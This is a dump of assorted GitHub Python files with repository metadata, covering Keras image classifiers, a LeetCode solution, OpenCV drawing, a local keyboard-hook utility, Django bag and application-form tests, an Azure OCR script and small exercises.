the training and validation\ndef plot_metrics(history, log_dir):\n # Plotting training accuracy\n fig, axs = plt.subplots(1, 2, figsize=(10,5))\n axs[0].plot(history.history['metrics/accuracy'], label='Train')\n axs[0].plot(history.history['val_metrics/accuracy'], label='Validation')\n axs[0].set_title('Training and Validation Accuracy')\n axs[0].set_xlabel('Epoch')\n axs[0].set_ylabel('Accuracy')\n axs[0].legend()\n\n # Plotting training loss\n axs[1].plot(history.history['loss'], label='Train')\n axs[1].plot(history.history['val_loss'], label='Validation')\n axs[1].set_title('Training and Validation Loss')\n axs[1].set_xlabel('Epoch')\n axs[1].set_ylabel('Loss')\n axs[1].legend()\n\n plt.tight_layout()\n \n image = fig_to_img(fig)\n image = resize_img_aspect(image, 512)\n plt.imsave(os.path.join(log_dir, 'plot.png'), image)\n \n plt.show()\n \n \n \ndef get_test_generator(class2int, resolution, log_dir, test_directory = \"data/validation_final_septiembre/\", exclude_pd=False):\n test_image_paths = get_files(test_directory, resolution=resolution, exclude_pd=exclude_pd) \n num_classes = len(class2int)\n class_names = sorted(class2int.keys())\n test_labels = list(map(lambda im: class2int[im.split(test_directory)[1].split('/')[0]] if num_classes in [5, 7] else class2int[im.split(test_directory)[1].split('/')[0].split('_')[0]], test_image_paths))\n\n # Test labels are repeated 4 times since each image is divided in 4 patches\n # test_labels = np.repeat(np.expand_dims(test_labels,0), 4,
0).T.flatten()\n # Extract image paths and labels\n\n test_generator = CustomDataGenerator(test_image_paths, test_labels, num_classes, shuffle_epoch=False, mode='val', batch_size=8)\n \n return test_generator\n \ndef test_model(model, test_generator, log_dir, class_names):\n\n test_predictions = model.predict(test_generator)\n test_labels = np.concatenate([np.argmax(t[1], 1) for t in test_generator])\n\n # Convert predictions to class labels\n predicted_labels = np.argmax(test_predictions, axis=1)\n \n # Calculate metrics\n accuracy = accuracy_score(test_labels, predicted_labels)\n precision = precision_score(test_labels, predicted_labels, average='macro')\n recall = recall_score(test_labels, predicted_labels, average='macro')\n\n print(\"Test Accuracy:\", accuracy)\n print(\"Test Precision:\", precision)\n print(\"Test Recall:\", recall)\n\n # Obtain the confusion matrix\n\n # Ensure that labels are unique and match the confusion matrix\n labels = np.unique(np.concatenate((test_labels, predicted_labels)))\n\n # Visualize the confusion matrix\n fig = plt.figure(figsize=(5,5))\n ax = fig.gca()\n ConfusionMatrixDisplay.from_predictions(test_labels, predicted_labels, display_labels=class_names, normalize='true', ax=ax)\n \n ax.set_title(f'Acc: {accuracy:4.2f}')\n image = fig_to_img(fig)\n image = resize_img_aspect(image, 512)\n plt.imsave(os.path.join(log_dir, 'confusion.png'), image)\n \n plt.show()\n\n# def train_evaluate(class_type, resolution,\n# public_directory = 'data/public_dataset/',\n# root_directory = \"data/dataset_2_final/\", \n# test_directory = \"data/validation_final_septiembre/\",\n# pretrain_dir = None,\n# exclude_pd = False\n# ):\n \n# if resolution == 'public':\n# root_directory = public_directory\n \n# resname = resolution if resolution is not None else 'all'\n \n# image_paths = get_files(root_directory, resolution=resolution, exclude_pd=exclude_pd)\n# class_names, class2int, labels = get_classes_labels(root_directory, image_paths, class_type, exclude_pd=exclude_pd)\n \n# num_classes = len(class2int)\n \n# display_markdown(f'## Evaluating {resname} resolution, {num_classes} classes, exc pd {exclude_pd}', raw=True)\n \n# train_generator, val_generator = get_generators(image_paths, labels, num_classes=num_classes, resolution=resolution)\n# class_weights = compute_weights(train_generator)\n\n# model = get_model(num_classes, resolution=resolution)\n \n# if pretrain_dir is not None:\n# model.load_weights(pretrain_dir)\n \n# MODEL_NAME = f'Ef0_{resname}_{num_classes}_classes_excpd{int(exclude_pd)}'\n# RUN_NAME = ''\n# log_dir = f'logs/{datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")}/{MODEL_NAME}{RUN_NAME}'\n# print(log_dir)\n \n# history = train_model(model, train_generator, val_generator, num_classes, class_weights, log_dir)\n \n# plot_metrics(history, log_dir)\n# test_model(model, class2int, resolution, log_dir, exclude_pd=exclude_pd)","repo_name":"jorgediosdado/lung_tissues_classification","sub_path":"histolungs.py","file_name":"histolungs.py","file_ext":"py","file_size_in_byte":18256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32903064460","text":"class Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n res = set()\n\n def backtrack(temp, elements):\n if not elements:\n res.add(tuple(temp.copy()))\n\n for e in elements:\n temp.append(e)\n new_nums = elements.copy()\n new_nums.remove(e)\n backtrack(temp, new_nums)\n temp.pop()\n\n backtrack([], nums)\n return [list(r) for r in 
res]\n","repo_name":"renyitan/data-structures-and-algorithms","sub_path":"python/leetcode/47-permutations-ii.py","file_name":"47-permutations-ii.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34537118404","text":"#Imports\nfrom __future__ import absolute_import, division, print_function\nimport tensorflow as tf\nimport os\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib \nmatplotlib.use('TkAgg') #Mac matplot workaround \nimport matplotlib.pyplot as plt \n\n\n#Functions\ndef plot_img(i, predictions_array, true_label, img):\n\tpredictions_array, true_label, img = predictions_array[i], true_label[i], img[i]\n\tplt.grid(False)\n\tplt.xticks([])\n\tplt.yticks([])\n\tplt.imshow(img, cmap=plt.cm.binary)\n\tpredicted_label = np.argmax(predictions_array)\n\tif predicted_label == true_label:\n\t\tcolor = 'green'\n\telse:\n\t\tcolor = 'red'\n\tplt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label], 100*np.max(predictions_array), class_names[true_label]), color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n\tpredictions_array, true_label = predictions_array[i], true_label[i]\n\tplt.grid(False)\n\tplt.xticks([])\n\tplt.yticks([])\n\tthisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n\tplt.ylim([0, 1])\n\tpredicted_label = np.argmax(predictions_array)\n\n\tthisplot[predicted_label].set_color('red')\n\tthisplot[true_label].set_color('green')\n\n\n\n#Load data\nfashion_mnist = keras.datasets.fashion_mnist\n\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n\n#Map imgs to classes\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat','Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n\n#Preprocessing\n\n#Visualization of pixel values\nplt.figure()\nplt.imshow(train_images[0])\nplt.colorbar()\nplt.grid(False)\n#plt.show()\n#screenshots/Figure_1.png\n\n#Scale images from 0-1 to feed into neural net\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\n\n#Set up layers\nmodel = keras.Sequential([\n\tkeras.layers.Flatten(input_shape=(28, 28)), #Flatten makes a (784,) input array\n\tkeras.layers.Dense(128, activation=tf.nn.relu), #By flattening the input the dense layers output will be (128) instead of (28, 128)\n\tkeras.layers.Dense(10, activation=tf.nn.softmax)\n])\n\n#Compile model\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\n#Training\nmodel.fit(train_images, train_labels, epochs=10) \n\n#Output:\n#Epoch 1/10 60000/60000 [==============================] - 29s 488us/sample - loss: 0.4945 - acc: 0.8269\n#Epoch 2/10 60000/60000 [==============================] - 29s 478us/sample - loss: 0.3725 - acc: 0.8660\n#Epoch 3/10 60000/60000 [==============================] - 32s 540us/sample - loss: 0.3371 - acc: 0.8761\n#Epoch 4/10 60000/60000 [==============================] - 30s 499us/sample - loss: 0.3145 - acc: 0.8836\n#Epoch 5/10 60000/60000 [==============================] - 30s 505us/sample - loss: 0.2968 - acc: 0.8911\n#Epoch 6/10 60000/60000 [==============================] - 30s 507us/sample - loss: 0.2824 - acc: 0.8939\n#Epoch 7/10 60000/60000 [==============================] - 30s 503us/sample - loss: 0.2704 - acc: 0.8992\n#Epoch 8/10 60000/60000 [==============================] - 33s 543us/sample - loss: 0.2592 - acc: 0.9037\n#Epoch 9/10 60000/60000 
[==============================] - 33s 555us/sample - loss: 0.2492 - acc: 0.9072\n#Epoch 10/10 60000/60000 [==============================] - 34s 565us/sample - loss: 0.2419 - acc: 0.9092\n\n#Accuracy\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\nprint('Test accuracy:', test_acc)\n#Output:\n#Test accuracy: 0.8794\n\n#Predictions\npredictions = model.predict(test_images)\npredictions[0]\n\n#Prediction visualization\nnum_rows = 5\nnum_cols = 3\nnum_images = num_rows*num_cols\nplt.figure(figsize=(2*2*num_cols, 2*num_rows))\nfor i in range(num_images):\n    plt.subplot(num_rows, 2*num_cols, 2*i+1)\n    plot_img(i, predictions, test_labels, test_images)\n    plt.subplot(num_rows, 2*num_cols, 2*i+2)\n    plot_value_array(i, predictions, test_labels)\n# plt.show()\n#screenshots/Figure_2.png\n\n#Single image prediction\nimg = test_images[0]\n\n#Batch where image is only member\nimg = (np.expand_dims(img, 0))\n\nsingle_prediction = model.predict(img)\nprint(single_prediction)\n#Output:\n#[[4.0423952e-06 1.7867489e-08 1.1013570e-05 8.0041261e-08 3.1214680e-07\n#\t1.8548490e-03 1.4891983e-05 1.1522283e-02 2.6472981e-06 9.8658991e-01]]\n\n\nplot_value_array(0, single_prediction, test_labels)\nplt.xticks(range(10), class_names, rotation=45)\n# plt.show()\n#screenshots/Figure_3.png\n\n#Prediction result\nresult = np.argmax(single_prediction[0])\nprint(result)\n#Output:\n#9\n","repo_name":"msk0693/Image_Classifier","sub_path":"image_classifier.py","file_name":"image_classifier.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10477567421","text":"from pyHook import HookManager, HookConstants\r\nfrom win32gui import PumpMessages, PostQuitMessage, PumpWaitingMessages\r\nfrom pynput.keyboard import Key, Controller\r\nfrom threading import Thread\r\nimport var\r\nfrom time import sleep\r\nimport sys\r\n\r\n\r\nclass Keystroke_Watcher:\r\n    def __init__(self, master=None):\r\n        self.hm = HookManager()\r\n        self.hm.KeyDown = self.on_key_down\r\n        self.hm.KeyUp = self.on_key_up\r\n        self.hm.HookKeyboard()\r\n        self.keys_held = set()  # set of all keys currently being pressed\r\n\r\n    def get_key_combo_code(self):\r\n        # find some way of encoding the presses.\r\n        return '+'.join([HookConstants.IDToName(key) for key in self.keys_held])\r\n\r\n    def on_key_down(self, event):\r\n        try:\r\n            self.keys_held.add(event.KeyID)\r\n        finally:\r\n            return True\r\n\r\n    def on_key_up(self, event):\r\n        keycombo = self.get_key_combo_code()\r\n        print(keycombo)\r\n        try:\r\n            # Do whatever you want with your keycombo here\r\n            pass\r\n        finally:\r\n            self.keys_held.remove(event.KeyID)\r\n            return True\r\n\r\n\r\ndef main():\r\n    watcher = Keystroke_Watcher()\r\n    PumpMessages()\r\n    # PumpWaitingMessages()\r\n\r\nif __name__ == '__main__':\r\n    # watcher = Keystroke_Watcher()\r\n    # PumpMessages()\r\n    main()","repo_name":"Shah-imran/copy-assister","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73613796007","text":"import cv2 as c\nimport numpy as np\nimport dlib\n\n# img = c.imread(\"car.jpg\")\n# scale_percent = 60\n# width = int(img.shape[1] * scale_percent / 400)\n# height = int(img.shape[0] * scale_percent / 400)\n\n# dim = (width, height)\n# print(dim)\n# images = c.resize(img, dim, interpolation = c.INTER_AREA)\n# c.imwrite(\"car_2.png\", images)\n# CONVERTING IMAGE TO GRAY\n# img_gray =
c.cvtColor(images, c.COLOR_BGR2GRAY)\n\n#BLUR IMAGE\n# img_blur = c.GaussianBlur(images, (7, 7), 0)\n\n# img_canny = c.Canny(images, 100, 100)\n# c.imshow(\"Image\", img_canny)\n\n# USING WEBCAM\n# video = c.VideoCapture(0)\n# video.set(3, 640)\n# video.set(4, 440)\n# video.set(10, 50)\n\n#GETTING THE WIDTH AND HEIGHT OF YOUR FRAME RECORDER\n# width = int(video.get(c.CAP_PROP_FRAME_WIDTH))\n# height = int(video.get(c.CAP_PROP_FRAME_HEIGHT))\n\n# CALLING THE VIDEO WRITER USING CV2 AND PASSING THE NEEDED PARAMETER\n# out = c.VideoWriter('output.mp4', c.VideoWriter_fourcc(*'DIVX'), 20, (width,height))\n\n# LOOPING FOR VIDEO DISPLAY\n# while True:\n#     success, img = video.read()\n#     c.imshow(\"My Video\", img)\n#     if c.waitKey(1) & 0xFF == ord(\"b\"):\n#         break\n\nimage = c.imread(\"my_image.png\")\np0 = 10, 10\np1 = 110, 90\np2 = 500, 10\n\nred = (0, 0, 255)\nline_image = c.line(image, p0, p1, red, 10)\nline_image = c.line(image, p0, p2, (200, 200, 0), 10)\n\nc.waitKey(0)\n\n","repo_name":"SoremiKayode/computervisionwitopencv","sub_path":"working_image.py","file_name":"working_image.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24015640753","text":"# from os import access\n# from pyexpat import model\n# import pandas as pd\n# import numpy as np\n# from sklearn.datasets import load_iris\n# from sklearn import svm\n# from sklearn.model_selection import cross_val_score\n\n# X,y=load_iris(return_X_y=True) #load the iris data\n\n# model=svm.SVC() #default kernel is linear\n# accuracy=cross_val_score(model,X,y,scoring='accuracy',cv=20) #cv=20 is the number of folds\n\n# print(accuracy.mean()*100) #accuracy of the model\n\n#--------------\n\nimport numpy as np\nimport mnist\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense\nfrom tensorflow.keras.utils import to_categorical\n\ntrain_images=mnist.train_images() #load the training images\ntrain_labels=mnist.train_labels() #load the training labels\ntest_images=mnist.test_images() #load the test images\ntest_labels=mnist.test_labels() #load the test labels\n\nprint(train_images.shape) #train_images is a numpy array of shape (60000,28,28)\n#using the 28x28 images of the mnist dataset to train the model\nprint(train_labels.shape) \n#train_labels is a numpy array of shape (60000,1) containing the labels of the training data\n\ntrain_images=(train_images/255)-0.5 #normalize the images to be between -0.5 and 0.5\ntest_images=(test_images/255)-0.5 #normalize the images to be between -0.5 and 0.5\n\nprint(train_images) #print the normalized training images\n\ntrain_images=np.expand_dims(train_images,axis=3) #add a dimension to the images to make them 3 dimensional (28x28x1)\ntest_images=np.expand_dims(test_images,axis=3) #add a dimension to the images to make them 3 dimensional (28x28x1)\n\nnum_filters=8 #number of filters in the convolutional layer\nfilter_size=3 #size of the filter\npool_size=2 #size of the pooling window\n\n#create a sequential model\nmodel=Sequential([ \n    Conv2D(num_filters,filter_size,input_shape=(28,28,1)),\n    MaxPooling2D(pool_size),\n    Flatten(),\n    Dense(10,activation='softmax')\n])\n\nmodel.compile('adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\nmodel.summary() #print the model
summary\n","repo_name":"NoorTaamreh/HTU-DataScience","sub_path":"ML/Session39.py","file_name":"Session39.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8911005566","text":"from django.conf import settings\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom products.models import Products\n\n\"\"\"\nholds bag items and calculates price\n\"\"\"\n\n\ndef bag_contents(request):\n\n bag_items = []\n total = 0\n product_count = 0\n bag = request.session.get('bag', {})\n\n for item_id, quantity in bag.items():\n product = get_object_or_404(Products, pk=item_id)\n total += quantity * product.price\n product_count += quantity\n bag_items.append({\n 'item_id': item_id,\n 'quantity': quantity,\n 'product': product,\n })\n\n order_total = total\n\n context = {\n 'bag_items': bag_items,\n 'total': total,\n 'order_total': order_total,\n 'product_count': product_count,\n }\n\n return context\n","repo_name":"ACEGAZ/game-hunter","sub_path":"bag/contexts.py","file_name":"contexts.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70235008808","text":"from datetime import date, timedelta\n\nfrom django.conf import settings\nfrom django.core import mail\nfrom django.urls import reverse\n\nfrom cciw.accounts.models import User\nfrom cciw.cciwmain.tests import factories as camps_factories\nfrom cciw.cciwmain.tests.mailhelpers import read_email_url\nfrom cciw.officers.tests import factories\nfrom cciw.officers.tests.base import RequireQualificationTypesMixin\nfrom cciw.utils.tests.webtest import WebTestBase\n\n\nclass ApplicationFormView(RequireQualificationTypesMixin, WebTestBase):\n def _application_edit_url(self, app_id):\n return reverse(\"admin:officers_application_change\", args=[app_id])\n\n def _setup(self, invitation=True) -> User:\n \"\"\"\n Initial setup for application form\n \"\"\"\n # Ensure we have a future camp (need for thisyears_applications logic),\n # but not too far in the future\n user = factories.create_officer()\n leader = factories.create_officer()\n if invitation:\n officers = [user]\n else:\n officers = []\n self.camp = camps_factories.create_camp(\n start_date=date.today() + timedelta(days=20), officers=officers, leader=leader\n )\n self.leader = leader\n self.officer_login(user)\n return user\n\n def _start_new(self):\n self.get_url(\"cciw-officers-applications\")\n self.submit(\"input[name=new]\")\n self.assertCode(200)\n\n def _finish_application_form(self, enter_dbs_number=False, override=None):\n # A full set of values that pass validation.\n values = {\n \"full_name\": \"x\",\n \"birth_date\": \"2000-01-01\",\n \"birth_place\": \"x\",\n \"address_firstline\": \"x\",\n \"address_town\": \"x\",\n \"address_county\": \"x\",\n \"address_postcode\": \"x\",\n \"address_country\": \"x\",\n \"address_tel\": \"x\",\n \"address_mobile\": \"x\",\n \"address_email\": \"foo@foo.com\",\n \"christian_experience\": \"x\",\n \"youth_experience\": \"x\",\n \"youth_work_declined_details\": \"x\",\n \"illness_details\": \"x\",\n \"referee1_name\": \"My Referee 1\",\n \"referee1_capacity_known\": \"Pastor\",\n \"referee1_address\": \"x\",\n \"referee1_tel\": \"x\",\n \"referee1_mobile\": \"x\",\n \"referee1_email\": \"foo1@foo1.com\",\n \"referee2_name\": \"My Referee 2\",\n \"referee2_capacity_known\": \"Boss\",\n \"referee2_address\": \"x\",\n \"referee2_tel\": 
\"x\",\n \"referee2_mobile\": \"x\",\n \"referee2_email\": \"foo2@foo2.com\",\n \"crime_details\": \"x\",\n \"court_details\": \"x\",\n \"concern_details\": \"x\",\n \"youth_work_declined\": \"2\",\n \"relevant_illness\": \"2\",\n \"crime_declaration\": \"2\",\n \"court_declaration\": \"2\",\n \"concern_declaration\": \"2\",\n \"allegation_declaration\": \"2\",\n \"dbs_check_consent\": \"2\",\n \"qualifications-0-type\": str(self.first_aid_qualification.id),\n \"qualifications-0-date_issued\": \"2016-01-01\",\n \"finished\": True,\n }\n if enter_dbs_number:\n values[\"dbs_number\"] = \"001234\"\n if override:\n for k, v in override.items():\n if v is None:\n del values[k]\n else:\n values[k] = v\n return self.fill_by_name(values)\n\n def _get_application_form_emails(self):\n return [e for e in mail.outbox if \"Application form\" in e.subject]\n\n def _get_email_change_emails(self):\n return [e for e in mail.outbox if \"Email change\" in e.subject]\n\n def _assert_finished_successful(self):\n self.assertNamedUrl(\"cciw-officers-applications\")\n\n self.assertTextPresent(\"have been notified of the completed application form by email.\")\n\n def _save(self):\n self.submit(\"[name=_save]\")\n\n def test_change_application(self):\n user = self._setup()\n app = factories.create_application(finished=False, referee1_name=\"My Initial Referee 1\")\n self.get_literal_url(self._application_edit_url(app.id))\n self.assertCode(200)\n self.assertTextPresent(\"Save and continue editing\")\n # Check that Referee initial values are set from model:\n self.assertTextPresent(\"My Initial Referee 1\")\n self.assertTextAbsent(\"Save and add another\")\n self.fill_by_name({\"full_name\": \"Test full name\"})\n self._save()\n self.assertNamedUrl(\"cciw-officers-applications\")\n assert user.applications.count() == 1\n app.refresh_from_db()\n assert app.full_name == \"Test full name\"\n\n # Check that Referee was propagated properly\n assert app.referee_set.get(referee_number=1).name == \"My Initial Referee 1\"\n\n def test_change_finished_application(self):\n \"\"\"\n Ensure that a leader can change a finished application of an officer\n \"\"\"\n user = self._setup()\n factories.create_application(officer=user, finished=True)\n\n self.officer_login(self.leader)\n # To catch a bug, give the leader an application form for the same camp\n factories.create_application(officer=self.leader)\n\n apps = user.applications.all()\n assert len(apps) == 1\n self.get_literal_url(self._application_edit_url(apps[0].id))\n self.assertCode(200)\n self.fill_by_name({\"full_name\": \"Changed full name\"})\n self._save()\n self.assertNamedUrl(\"cciw-officers-applications\")\n assert user.applications.count() == 1\n assert user.applications.all()[0].full_name == \"Changed full name\"\n\n def _change_email_setup(self):\n user = self._setup()\n assert len(mail.outbox) == 0\n application = factories.create_application(finished=False)\n assert user.applications.count() == 1\n\n # email asserts\n orig_email = user.email\n new_email = \"a_different_email@foo.com\"\n assert orig_email != new_email\n\n # visit page\n self.get_literal_url(self._application_edit_url(application.id))\n self.assertCode(200)\n self._finish_application_form()\n self.fill_by_name({\"full_name\": \"Test full name\", \"address_email\": new_email})\n self._save()\n self.assertNamedUrl(\"cciw-officers-applications\")\n assert user.applications.count() == 1\n\n # Check the emails have been sent\n emails = self._get_email_change_emails()\n assert len(emails) == 1\n 
return user, orig_email, new_email, emails\n\n def test_change_email_address(self):\n # When submitted email address is different from the one stored against\n # the user, an email should be sent with a link to update the stored\n # email address\n\n # This is a 'story' test, really, not a unit test, because we want to\n # check several different conclusions.\n\n user, orig_email, new_email, emails = self._change_email_setup()\n\n # Read the email\n url, path, querydata = read_email_url(emails[0], \"https?://.*/correct-email/.*\")\n\n # Check that nothing has changed yet\n user.refresh_from_db()\n assert user.email == orig_email\n\n # follow link - deliberately wrong first time\n response = self.client.get(path, {\"token\": \"foo\"})\n assert response.status_code == 200\n self.assertContains(response, \"Update failed\")\n\n # Check that nothing has changed yet\n user.refresh_from_db()\n assert user.email == orig_email\n\n # follow link, right this time\n response = self.client.get(path, querydata)\n assert response.status_code == 200\n self.assertContains(response, \"Update successful\")\n\n # check email address has changed\n user.refresh_from_db()\n assert user.email == new_email\n\n def test_change_email_address_mistakenly(self):\n # Same as above, but this time we click the link to correct the\n # application form which has a wrong email address\n\n user, user_email, application_email, emails = self._change_email_setup()\n\n # Read the email\n url, path, querydata = read_email_url(emails[0], \"https?://.*/correct-application/.*\")\n\n # Check that nothing has changed yet\n assert user.email == user_email\n assert user.applications.all()[0].address_email == application_email\n\n # follow link - deliberately wrong first time\n response = self.client.get(path, {\"token\": \"foo\"})\n assert response.status_code == 200\n self.assertContains(response, \"Update failed\")\n\n # Check that nothing has changed yet\n assert user.applications.all()[0].address_email == application_email\n\n # follow link, right this time\n response = self.client.get(path, querydata)\n assert response.status_code == 200\n self.assertContains(response, \"Update successful\")\n\n # check email address has changed\n assert user.applications.all()[0].address_email == user_email\n\n def test_unchanged_email_address(self):\n \"\"\"\n Check that if the email address is not changed (or is just different case)\n then no email is sent out\n \"\"\"\n user = self._setup()\n self._start_new()\n self._finish_application_form()\n self.fill_by_name({\"address_email\": user.email.upper()})\n self._save()\n\n # Check no emails have been sent\n emails = self._get_email_change_emails()\n assert len(emails) == 0\n\n def test_finish_incomplete(self):\n user = self._setup()\n assert user.applications.count() == 0\n self._start_new()\n url = self.current_url\n self.fill_by_name({\"finished\": True})\n self._save()\n self.assertUrlsEqual(url) # Same page\n self.assertTextPresent(\"Please correct the errors below\")\n self.assertTextPresent(\"form-row errors field-address\")\n assert user.applications.exclude(date_saved__isnull=True).count() == 0 # shouldn't have been saved\n\n def test_finish_complete(self):\n user = self._setup()\n assert user.applications.count() == 0\n assert len(mail.outbox) == 0\n self._start_new()\n\n # Add two applications\n factories.create_application(officer=user, finished=False, date_saved=date(2010, 1, 1))\n # Most recent one:\n application = factories.create_application(officer=user, finished=False)\n 
self.get_literal_url(self._application_edit_url(application.id))\n self.assertCode(200)\n self._finish_application_form()\n self._save()\n self._assert_finished_successful()\n\n apps = list(user.applications.all())\n # The old one should have been deleted.\n assert len(apps) == 1\n assert application.id == apps[0].id\n\n assert apps[0].referee_set.get(referee_number=1).name == \"My Referee 1\"\n assert apps[0].referee_set.get(referee_number=1).capacity_known == \"Pastor\"\n assert apps[0].referee_set.get(referee_number=2).name == \"My Referee 2\"\n assert apps[0].referee_set.get(referee_number=2).capacity_known == \"Boss\"\n\n # There should be two emails in outbox, one to officer, one to\n # leader. This assumes that there is a leader for the camp,\n # and it is associated with a User object.\n emails = self._get_application_form_emails()\n assert len(emails) == 2\n\n # Email should be sent when application is fully saved.\n for m in emails:\n for txt in [\"My Referee 1\", \"First Aid\"]:\n # One to officer should contain attachments, one to leader must\n # not.\n if any(user.email in a for a in m.to):\n assert txt in m.body\n assert txt in m.attachments[0][1]\n else:\n assert txt not in m.body\n assert len(m.attachments) == 0\n\n def test_finish_complete_no_invitation(self):\n user = self._setup(invitation=False)\n assert user.applications.count() == 0\n assert len(mail.outbox) == 0\n self._start_new()\n self._finish_application_form()\n self._save()\n self.assertNamedUrl(\"cciw-officers-applications\")\n self.assertTextPresent(\"The application form has been sent to the CCiW secretary\")\n\n # There should be two emails in outbox, one to officer, one to\n # secretary.\n emails = self._get_application_form_emails()\n assert len(emails) == 2\n assert any(e.to == settings.SECRETARY_EMAILS for e in emails)\n\n def test_change_application_after_finished(self):\n \"\"\"\n Ensure that the user can't change an application after it has been\n 'finished'\n \"\"\"\n user = self._setup()\n application = factories.create_application(officer=user, finished=True)\n\n self.get_literal_url(self._application_edit_url(application.id))\n url = self.current_url\n self.assertCode(200)\n self.fill_by_name({\"full_name\": \"A Changed Full Name\"})\n self._save()\n # we should be on same page:\n self.assertUrlsEqual(url)\n self.assertTextPresent(\"You cannot change a submitted\")\n # shouldn't have changed data:\n application.refresh_from_db()\n assert application.full_name != \"A Changed Full Name\"\n\n def test_list_applications_officers(self):\n \"\"\"\n Ensure that normal officers can't see the list of applications\n \"\"\"\n self.officer_login(factories.create_officer())\n self.get_literal_url(reverse(\"admin:officers_application_changelist\"), expect_errors=[403])\n self.assertCode(403)\n\n def test_list_applications_leaders(self):\n \"\"\"\n Ensure that leaders can see the list of applications\n \"\"\"\n leader = factories.create_current_camp_leader()\n self.officer_login(leader)\n self.get_url(\"admin:officers_application_changelist\")\n self.assertTextPresent(\"Select application to change\")\n\n def test_add_application_duplicate(self):\n \"\"\"\n Test that we can't add a new application twice in a year\n \"\"\"\n user = self._setup()\n factories.create_application(officer=user, date_saved=date.today(), finished=True)\n a2 = factories.create_application(officer=user, date_saved=None, finished=False)\n self.get_literal_url(self._application_edit_url(a2.id))\n self._finish_application_form()\n 
self._save()\n        self.assertTextPresent(\"You've already submitted\")\n        assert user.applications.exclude(date_saved__isnull=True).count() == 1\n\n    def test_save_partial(self):\n        user = self._setup()\n        self._start_new()\n        self.fill_by_name({\"full_name\": \"My Name Is ...\"})\n        self._save()\n        apps = user.applications.all()\n        assert len(apps) == 1\n        a = apps[0]\n        assert a.full_name == \"My Name Is ...\"\n        assert not a.finished\n\n    def test_dbs_number_entered(self):\n        user = self._setup()\n        self._start_new()\n        self._finish_application_form(enter_dbs_number=True)\n        self._save()\n        self._assert_finished_successful()\n        a = user.applications.get()\n        assert a.dbs_number == \"001234\"\n        assert a.finished\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/officers/tests/test_applicationform.py","file_name":"test_applicationform.py","file_ext":"py","file_size_in_byte":15408,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"18752723066","text":"from azure.ai.formrecognizer import FormRecognizerClient\r\nfrom azure.core.credentials import AzureKeyCredential\r\nimport csv\r\n\r\nclient = FormRecognizerClient(\r\n    \"\",\r\n    AzureKeyCredential(\"\")\r\n)\r\n\r\noutput = []\r\n\r\nwith open('prescription_1.jpg', 'rb') as f:\r\n    form_rec = client.begin_recognize_content(form=f)\r\n\r\nresult = form_rec.result()\r\n\r\nfor idx, content in enumerate(result):\r\n    for line_idx, line in enumerate(content.lines):\r\n        for word in line.words:\r\n            output.append((word.text,word.confidence))\r\n\r\nwith open(\"azure_presc_1.csv\",\"a\",newline=\"\") as f:\r\n    writer = csv.writer(f)\r\n    writer.writerows(output)\r\n\r\nprint(\"done\")\r\n\r\n\r\n\r\n\r\n    ","repo_name":"shivmistry605/Prescription-Project","sub_path":"demo_azure.py","file_name":"demo_azure.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6575361961","text":"n = int(input())\nflat = False\na = []\n\nwhile 1:\n    s = input().split()\n    for i in range(len(s)):\n        a.append(int(s[i]))\n        if(len(a) == n):\n            flat = True\n            break\n    if(flat):\n        break\n    \nb = []\nc = []\nfor i in range(n):\n    if(a[i] % 2 == 0):\n        b.append(a[i])\n    else:\n        c.append(a[i])\nb.sort()\nc.sort(reverse=True)\nx = 0\ny = 0\nfor i in range(n):\n    if(a[i] % 2 == 0):\n        print(b[x], end=' ')\n        x+=1\n    else:\n        print(c[y], end=' ')\n        y+=1","repo_name":"bakachanbaby/code_ptit","sub_path":"sap_xep_chan_le.py","file_name":"sap_xep_chan_le.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30484028154","text":"import threading\nimport typing\n\nclass Flask:\n    def __init__(self, config:dict):\n        self.title = config[\"name\"]\n        self.S_ADDR = config[\"flask_address\"]\n        self.app = config[\"flask_app\"]\n\n    def run_server(self, port=80):\n        # drop the URL scheme so app.run receives a bare host\n        t = threading.Thread(target=lambda: self.app.run(self.S_ADDR.removeprefix(\"http://\"), port))\n        